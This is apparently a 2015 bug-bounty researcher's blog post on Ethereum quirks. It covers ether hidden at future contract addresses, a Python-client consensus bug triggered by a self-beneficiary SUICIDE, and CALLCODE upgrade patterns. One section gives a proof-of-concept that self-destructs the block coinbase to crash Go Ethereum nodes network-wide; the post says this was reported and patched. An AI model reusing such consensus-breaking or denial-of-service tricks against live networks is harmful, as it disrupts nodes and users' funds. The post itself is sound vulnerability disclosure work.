Ethereum quirks

I’ve continued diving deep into the mechanics of Ethereum, having previously found vulnerabilities in the Python client and in the Go and C++ clients, as well as insecure contracts. Lately, I’ve come across a few interesting quirks as well as some more vulnerabilities.

Quirk #1 - hiding in plain sight

There are two types of accounts within Ethereum: normal accounts and contract accounts. Contracts are created by sending transactions with an empty to-field; the transaction contains some data which is executed (à la constructor) and, hopefully, returns some code which gets placed on the blockchain. Contracts are, naturally, part of the same address space as normal accounts, and the address of a contract is determined thus:

address = sha3(rlp_encode([creator_account, creator_account_nonce]))[12:]

This is fully deterministic. For a given account, say accountA at 0x6ac7ea33f8831ea9dcc53393aaa88b25a785dbf0, the addresses of the contracts it will create are the following:

nonce0= "0xcd234a471b72ba2f1ccf0a70fcaba648a5eecd8d"

nonce1= "0x343c43a37d37dff08ae8c4a11544c718abb4fcf8"

nonce2= "0xf778b86fa74e846c4f0a1fbd1335fe81c00a0c91"

nonce3= "0xfffd933a0bc612844eaf0c6fe3e5b8e9b6c1d19c"
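The list above can be reproduced with a short, dependency-free Python sketch. It assumes the original Keccak-256 padding (what Ethereum calls sha3, which is not the same as the NIST SHA3-256 in `hashlib`) and only handles the short RLP forms needed for an address and a small nonce. The helper names `keccak256`, `rlp_item`, `rlp_list` and `contract_address` are my own and not taken from any client.

```python
MASK64 = (1 << 64) - 1


def _rol64(value, shift):
    """Rotate a 64-bit lane left by `shift` bits."""
    shift %= 64
    return ((value << shift) | (value >> (64 - shift))) & MASK64


def _keccak_f1600(lanes):
    """Keccak-f[1600] permutation on a 5x5 matrix of 64-bit lanes."""
    lfsr = 1
    for _ in range(24):
        # theta
        c = [lanes[x][0] ^ lanes[x][1] ^ lanes[x][2] ^ lanes[x][3] ^ lanes[x][4]
             for x in range(5)]
        d = [c[(x + 4) % 5] ^ _rol64(c[(x + 1) % 5], 1) for x in range(5)]
        lanes = [[lanes[x][y] ^ d[x] for y in range(5)] for x in range(5)]
        # rho and pi
        x, y = 1, 0
        current = lanes[x][y]
        for t in range(24):
            x, y = y, (2 * x + 3 * y) % 5
            current, lanes[x][y] = lanes[x][y], _rol64(current, (t + 1) * (t + 2) // 2)
        # chi
        for y in range(5):
            row = [lanes[x][y] for x in range(5)]
            for x in range(5):
                lanes[x][y] = row[x] ^ (~row[(x + 1) % 5] & row[(x + 2) % 5])
        # iota (round constants generated by an LFSR)
        for j in range(7):
            lfsr = ((lfsr << 1) ^ ((lfsr >> 7) * 0x71)) % 256
            if lfsr & 2:
                lanes[0][0] ^= 1 << ((1 << j) - 1)
    return lanes


def keccak256(data):
    """Original Keccak-256 (padding byte 0x01), as used by Ethereum."""
    rate = 136
    padded = bytearray(data) + bytes(rate - len(data) % rate)
    padded[len(data)] ^= 0x01
    padded[-1] ^= 0x80
    state = bytearray(200)
    for offset in range(0, len(padded), rate):
        for i in range(rate):
            state[i] ^= padded[offset + i]
        lanes = [[int.from_bytes(state[8 * (x + 5 * y):8 * (x + 5 * y) + 8], "little")
                  for y in range(5)] for x in range(5)]
        lanes = _keccak_f1600(lanes)
        for x in range(5):
            for y in range(5):
                state[8 * (x + 5 * y):8 * (x + 5 * y) + 8] = lanes[x][y].to_bytes(8, "little")
    return bytes(state[:32])


def rlp_item(raw):
    """RLP-encode a byte string shorter than 56 bytes."""
    if len(raw) == 1 and raw[0] < 0x80:
        return raw
    assert len(raw) < 56, "long strings are not handled in this sketch"
    return bytes([0x80 + len(raw)]) + raw


def rlp_list(encoded_items):
    """RLP-encode a list whose total payload is shorter than 56 bytes."""
    payload = b"".join(encoded_items)
    assert len(payload) < 56, "long lists are not handled in this sketch"
    return bytes([0xC0 + len(payload)]) + payload


def contract_address(creator_hex, nonce):
    """Address of the contract created by `creator_hex` at the given nonce."""
    creator = bytes.fromhex(creator_hex[2:])
    nonce_bytes = nonce.to_bytes((nonce.bit_length() + 7) // 8, "big")  # 0 -> b""
    encoded = rlp_list([rlp_item(creator), rlp_item(nonce_bytes)])
    return "0x" + keccak256(encoded)[12:].hex()


account_a = "0x6ac7ea33f8831ea9dcc53393aaa88b25a785dbf0"
for nonce in range(4):
    print(nonce, contract_address(account_a, nonce))
```

The pure-Python Keccak is slow but keeps the example self-contained; a real tool would use an existing Keccak library instead.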

This is a bit interesting; it means that these can be used to ‘hide’ money. From accountA, we can send ether to e.g. the nonce1-address. At this address, the ether will be unrecoverable, until we first make a transaction (increasing accountA nonce to 1) and then create a contract which lands on nonce1 and thus becomes the owner of the money; and can send it back again.

Furthermore, it would be possible to not just hide money in “vertical” mode via nonce, but also “horizontally” by deeper levels of contracts:

                                                       nonce+3 --> contract3
                                                       nonce+2
                                                       nonce+1
                 nonce+2 --> contract1 --> contract2 : nonce
                 nonce+1
    `accountA` : nonce

The operation above could be expressed as up, up, in, in, up, up, up, in, or as a binary representation: 11001110 or 0xCE. I don’t know if there’s a problem which fits this solution; perhaps if you need to store your private key on a piece of paper (as a backup) or on a non-encrypted piece of media while going through customs. If that key is compromised, chances are that the attacker wouldn’t find the assets hidden several layers in. However, it also seems like a very good way to lose those assets forever, should you happen to perform one transaction too many and sail past the magic nonce as you try to recover them.
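As a small illustration of the up/in encoding, here is a Python sketch that packs such a path into an integer and unpacks it again. The function names `encode_path` and `decode_path` are hypothetical, and the convention (up = 1, in = 0, most significant bit first) is simply the one implied by the 11001110 example.

```python
def encode_path(steps):
    """Pack a list of 'up'/'in' steps into an integer, first step in the highest bit."""
    value = 0
    for step in steps:
        if step not in ("up", "in"):
            raise ValueError(f"unknown step: {step!r}")
        value = (value << 1) | (1 if step == "up" else 0)
    return value


def decode_path(value, length):
    """Unpack `length` steps from an integer produced by encode_path."""
    return ["up" if (value >> shift) & 1 else "in"
            for shift in range(length - 1, -1, -1)]


path = ["up", "up", "in", "in", "up", "up", "up", "in"]
code = encode_path(path)
print(hex(code))  # 0xce
```

Note that the number of steps has to be remembered alongside the value, since a path starting with "in" produces leading zero bits.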

Contract address clashes

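Would it be possible to get the private key to a contract? Or, put another way, could someone generate a private key p1 and another private key p2, so that the account address derived from p1 equals the address of the first contract created by the account of p2:

address(p1) == sha3(rlp_encode([address(p2), 0]))[12:]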

We can view this as the birthday problem. The difference is that instead of 365 days, we have 2^160 “birthdays”: how many individuals (keys) do we need in order to find two which have the same birthday? A lot, it turns out. By the usual square-root estimate, somewhere on the order of 2^80, or roughly 10^24. However, if we actually were successful, it would mean that a contract could actually be overwritten. Not just any contract, mind you, only the specially minted contract that someone just spent millions of dollars to find the collision for.
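For a rough sense of scale, the standard birthday approximation n ≈ sqrt(2 · N · ln(1 / (1 − p))) can be evaluated directly. This is only a back-of-the-envelope sketch that treats addresses as uniformly random; the function name `draws_for_collision` is my own.

```python
import math


def draws_for_collision(space, probability=0.5):
    """Approximate number of random draws from `space` values before a
    collision occurs with the given probability (birthday approximation)."""
    return math.sqrt(2 * space * math.log(1 / (1 - probability)))


print(round(draws_for_collision(365), 1))        # classic birthday problem, about 22.5
print(f"{draws_for_collision(2 ** 160):.2e}")    # 160-bit addresses, roughly 1.4e24
```

With a 160-bit address space the estimate lands a little above 2^80 draws for a 50% chance of any collision.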

Quirk #2 - Vanishing Ether

I found another consensus issue where the Python client differs from Go/C++. When performing a SUICIDE with the beneficiary set to the contract itself, the Go/C++ clients ensure that, in the end, the contract holds 0 eth. The Python client did not:

    elif op == 'SUICIDE':
        # to is 'me' address
        to = utils.encode_int(stk.pop())
        to = ((b'\x00' * (32 - len(to))) + to)[12:]
        # xfer is now X eth
        xfer = ext.get_balance(msg.to)
        # 'me' is set to 0
        ext.set_balance(msg.to, 0)
        # 'me' becomes set to X again
        ext.set_balance(to, ext.get_balance(to) + xfer)
        ext.add_suicide(msg.to)

Here’s an example of a solidity contract which would trigger this bug:

    contract pykiller {
        function()
        {
            suicide(this);
        }
    }

Although Python breaks consensus versus the other clients (and the specification), I would actually have preferred if the Python behaviour had been determined as “correct”. Otherwise, this mechanism can actually delete ether from existence (as opposed to just sending ether to accounts with no known keys), which means the number of ether in existence can no longer be derived from the block number alone. So, the ‘naive’ attempt to count ether, genesis + 5 * blocknumber, is not correct; the only way to get the true number of ether in existence is to iterate over all accounts and sum their balances.
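The difference comes down to the order of two balance writes, which a toy Python model makes visible. This is a sketch under loud assumptions: balances live in a plain dict, the function names are hypothetical, the end-of-transaction deletion of the account is not modelled, and `suicide_zero_last` is merely one ordering that produces the outcome described for Go/C++, not their actual code.

```python
def suicide_credit_last(balances, contract, beneficiary):
    """Order from the Python client snippet: zero the contract, then credit the beneficiary."""
    xfer = balances.get(contract, 0)
    balances[contract] = 0
    balances[beneficiary] = balances.get(beneficiary, 0) + xfer


def suicide_zero_last(balances, contract, beneficiary):
    """Assumed alternative order: credit the beneficiary, then zero the contract."""
    xfer = balances.get(contract, 0)
    balances[beneficiary] = balances.get(beneficiary, 0) + xfer
    balances[contract] = 0


def total_supply(balances):
    """The only reliable ether count: the sum over all accounts."""
    return sum(balances.values())


python_view = {"pykiller": 10, "alice": 5}
other_view = dict(python_view)

suicide_credit_last(python_view, "pykiller", "pykiller")  # beneficiary is the contract itself
suicide_zero_last(other_view, "pykiller", "pykiller")

print(total_supply(python_view))  # 15, nothing lost
print(total_supply(other_view))   # 5, ten units have vanished
```

When the beneficiary is any other account, both orderings give the same result; they only diverge in the self-beneficiary case.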

So if you ever want to perform a proof-of-burn, don’t just send ether to 0x000... (to which only NSA has the key), let the ether burn in a self-beneficiary SUICIDE instead.

This issue yielded another 4000 points on the bounty leaderboard, netting 4 BTC.

That time I could have nuked 75% of the network

While experimenting with suicides and contract addresses, it struck me that contracts can be made to hold ether again - after SUICIDE. All that would be needed was for them to SUICIDE another contract afterwards. Example contract(s):

    contract A{
        function kill(address beneficiary){
            suicide(beneficiary);
        }
    }

    contract B{
        function kill(){
            suicide(msg.sender);
        }
        function foo(address to_a){
            //kill self
            B(this).kill();
            //Kill another, benefit this
            A(to_a).kill(this);
        }
    }

The contract above would have caused another Python consensus break. However, I was miffed to discover that it actually did NOT break the Go client. It turned out that I had misunderstood the state-transition mechanism a bit. So I studied that part some more, and came upon another variant which triggers a Denial-of-Service vulnerability instead.

The block processor, when processing an imported block, basically iterates over all of the block’s transactions and applies them sequentially. When applying a transaction involving a SUICIDE operation, the semantics are a bit tricky:

- For the duration of the transaction, the account exists, has code and (potentially) a value (e.g. in the scenario above)

- Once the transaction has finished, but before the next transaction, the account should be deleted, emptying code, storage, nonce and value.
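The two rules above can be sketched as a toy state machine in Python. Everything here is an assumption made for illustration: `ToyState`, its fields and the account layout are hypothetical and far simpler than any real client.

```python
class ToyState:
    """Minimal account state with deletion deferred to the end of a transaction."""

    def __init__(self):
        self.accounts = {}     # address -> {"balance": int, "code": str}
        self.suicides = set()  # addresses marked for deletion in the current transaction

    def suicide(self, address, beneficiary):
        """Move the balance to the beneficiary and mark the account for deletion."""
        account = self.accounts[address]
        target = self.accounts.setdefault(beneficiary, {"balance": 0, "code": ""})
        amount = account["balance"]
        account["balance"] = 0
        target["balance"] += amount
        self.suicides.add(address)

    def apply_transaction(self, tx):
        """Run the transaction, then delete every account that was marked."""
        tx(self)
        for address in self.suicides:
            self.accounts.pop(address, None)
        self.suicides.clear()


observed = {}


def tx(state):
    state.suicide("B", "user")  # B kills itself first
    state.suicide("A", "B")     # A then kills itself, benefiting the already-killed B
    observed["B_exists_during_tx"] = "B" in state.accounts
    observed["B_balance_during_tx"] = state.accounts["B"]["balance"]


state = ToyState()
state.accounts = {"A": {"balance": 7, "code": "a"}, "B": {"balance": 3, "code": "b"}}
state.apply_transaction(tx)
print(observed, sorted(state.accounts))
```

Inside the transaction B still exists and holds the 7 units it received after its own SUICIDE; once the transaction ends, both A and B are gone and those 7 units with them.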

I saw that the Go-client construction for this looked something like this:

    func (...) TransitionState(statedb *state.StateDB, ...) (..) {
        coinbase := statedb.GetOrNewStateObject(block.Coinbase())
        // Process the transactions on to parent state
        receipts, err = sm.ApplyTransactions(coinbase, statedb, block ...)
        [...]

    func (...) ApplyTransaction(coinbase *state.StateObject, statedb *state.StateDB, ...) (...) {
        // The function below returns `nil` if the account has been deleted
        cb := statedb.GetStateObject(coinbase.Address())
        // The call below gets called with cb == nil, resulting in panic
        _, gas, err := ApplyMessage(NewEnv(statedb, self.bc, tx, header), tx, cb)
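The failure mode in the Go snippet can be mimicked in a few lines of Python, where a missing lookup returns `None` instead of `nil`. This is only an analogy under stated assumptions: `ToyStateDB`, `apply_message` and the fee handling are hypothetical stand-ins, not a port of the Geth code.

```python
class ToyStateDB:
    """Dictionary-backed stand-in for a state database."""

    def __init__(self):
        self.objects = {}

    def get_state_object(self, address):
        """Return the account object, or None if it does not exist."""
        return self.objects.get(address)

    def get_or_new_state_object(self, address):
        """Return the account object, creating an empty one if needed."""
        return self.objects.setdefault(address, {"balance": 0})

    def delete(self, address):
        self.objects.pop(address, None)


def apply_message(coinbase_object, fee):
    """Credit the fee to the coinbase; fails if the object is None."""
    coinbase_object["balance"] += fee


def apply_transaction(db, coinbase_address, fee, suicides=()):
    cb = db.get_state_object(coinbase_address)  # looked up again for every transaction
    apply_message(cb, fee)
    for address in suicides:                    # deferred deletion at end of transaction
        db.delete(address)


db = ToyStateDB()
db.get_or_new_state_object("coinbase")          # created once per block
apply_transaction(db, "coinbase", fee=1, suicides=["coinbase"])

try:
    apply_transaction(db, "coinbase", fee=1)    # the next transaction in the same block
    crashed = False
except TypeError:
    crashed = True

print(crashed)  # True
```

The first transaction succeeds and removes the coinbase account; the second one finds nothing at that address and fails when it tries to use the result.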

So, if we SUICIDE the coinbase, we can cause global panic across Go-nodes! Here’s a proof-of-concept testcase:

    //Create the contract
    var killerSource = 'contract killer { function x() { suicide(msg.sender); }}'
    //Deploy
    contract = deploy(killerSource, eth.accounts[0]);
    // store contract address in variable
    //address = 036d278e6fcdf78353e163d5e9a4efb907ec27d2
    x = eth.contract(contract.info.abiDefinition).at(address);
    //Set the miner coinbase to the address
    miner.setEtherbase(address)
    //mine a few blocks, then stop
    //Send killer-transaction
    x.x.sendTransaction({from : eth.accounts[0], value : 10000});
    //Send two more, one with higher value and one with less
    //this ensures that at least one will execute after
    // the killer-transaction
    eth.sendTransaction({to: "0x0000000000000000000000000000000000000000", from : eth.accounts[0], value : 100000});
    eth.sendTransaction({to: "0x0000000000000000000000000000000000000000", from : eth.accounts[0], value : 100});

In practice, we’d have to include the payload transaction within a block that we mined ourselves (since that’s the only way to set the block coinbase), but that’s very doable. Since the C++ clients would not be affected by this, they would help spread the bad block to all Geth clients in the network.



A quick peek at the network statistics show that roughly 75% of all miners use the Geth client:

The vulnerability I just described was also described on the Ethereum blog, and led to the release of Geth version 1.1.1. It yielded 7000 points on the bug bounty, earning a neat 7 BTC since it was both a Go DoS and a Python consensus break.

Quirk #3 - Dynamic contracts

One opcode that so far has gone pretty much under the radar is the CALLCODE operation. Just in the last few days, it’s been introduced into Solidity (post here). This operation is interesting: it loads a chunk of code from another contract and executes that code within the current context (storage etc). This is different from a contract invocation, since a contract invocation executes within the “other” contract’s context.

This little feature could be used to implement patching of existing contracts. Currently, whenever a contract is placed on the EVM, it’s there, immutable, forever (or until it’s killed off). With CALLCODE, it is possible to create one ‘public’ contract which utilises APIs from other underlying contracts, which can be replaced at will.

In the extreme case; you could have a contract “BankOfMerica”. That contract could be just a simple pointer to the real contract, which can be replaced any time. Here’s some pseudo-code which is guaranteed not to compile:

    contract BankOfMerica{
        address administrator;
        address implementation;

        BankOfMerica(address admin)
        {
            administrator = admin;
        }

        setImp(address newImplementation)
        {
            if(msg.sender == administrator){
                implementation = newImplementation;
            }
        }

        invoke( ... )
        {
            callcode(implementation).invoke(msg.data)
        }
    }

Caveat: I’m not 100% sure that I’m correct about the mechanisms of CALLCODE nor the consequences, but the operation definitely seems interesting.
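To make the idea concrete without relying on EVM details, here is a toy Python model of the difference between a plain invocation and a CALLCODE-style invocation, plus a swappable implementation. All names (`ToyContract`, `ToyBank`, `call`, `callcode`, the deposit functions) are hypothetical, and the model cheats by keeping the administrator and implementation pointers outside of contract storage.

```python
class ToyContract:
    """A contract is just some storage plus a callable acting as its code."""

    def __init__(self, code=None):
        self.storage = {}
        self.code = code  # callable(storage, *args)


def call(target, *args):
    """Plain invocation: the target's code runs against the target's own storage."""
    return target.code(target.storage, *args)


def callcode(caller, target, *args):
    """CALLCODE-style invocation: the target's code runs against the caller's storage."""
    return target.code(caller.storage, *args)


def deposit_v1(storage, who, amount):
    storage[who] = storage.get(who, 0) + amount


def deposit_v2(storage, who, amount):
    storage[who] = storage.get(who, 0) + amount
    storage["deposits"] = storage.get("deposits", 0) + 1  # the "patched" behaviour


class ToyBank(ToyContract):
    """Public contract that forwards every invocation to a replaceable implementation."""

    def __init__(self, administrator):
        super().__init__()
        self.administrator = administrator
        self.implementation = None

    def set_imp(self, sender, implementation):
        if sender == self.administrator:
            self.implementation = implementation

    def invoke(self, *args):
        return callcode(self, self.implementation, *args)


impl_v1 = ToyContract(deposit_v1)
impl_v2 = ToyContract(deposit_v2)
bank = ToyBank(administrator="admin")

bank.set_imp("admin", impl_v1)
bank.invoke("alice", 10)
bank.set_imp("mallory", impl_v2)  # ignored, not the administrator
bank.set_imp("admin", impl_v2)    # the bank is "patched"
bank.invoke("alice", 5)
call(impl_v1, "bob", 1)           # plain call: lands in impl_v1's own storage

print(bank.storage, impl_v1.storage, impl_v2.storage)
```

In a real contract the two pointers would themselves live in storage, so the borrowed code could overwrite them; that simplification is deliberate here and worth keeping in mind.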

Quirk #4 - Verify caller

One last quirk, or rather, ‘solution awaiting a problem’: I’ve noticed a neat way to validate that the caller is indeed a regular account and not a contract, or vice versa.

if(msg.sender == tx.origin)

The condition above will always be true if the invocation is performed directly from a normal account. Similarly, it will never be true if the invocation is performed via another contract. In the example of the Ethereum Blackjack hack, the snippet above would have solved the most glaring vulnerability, although other attacks would still have been possible. I have a feeling that there may be cases where such validation is legit, though.
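The check can be illustrated with a tiny Python model of a call chain, where the first entry is the account that signed the transaction and every later entry is a contract invoked by the previous one. The function names and the list representation are assumptions made purely for this sketch.

```python
def sender_and_origin(chain):
    """Return (msg.sender, tx.origin) as seen by the last contract in the chain.

    chain[0] is the external account that signed the transaction; each later
    entry is a contract called by the entry before it.
    """
    if len(chain) < 2:
        raise ValueError("need at least an originating account and one contract")
    return chain[-2], chain[0]


def called_directly(chain):
    """True when the last contract was invoked straight from the signing account."""
    msg_sender, tx_origin = sender_and_origin(chain)
    return msg_sender == tx_origin


print(called_directly(["alice", "Target"]))              # True
print(called_directly(["alice", "Attacker", "Target"]))  # False
```

However deep the chain gets, the origin stays the signing account while the sender is always the immediate caller, which is why the comparison separates the two cases.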

2015-09-15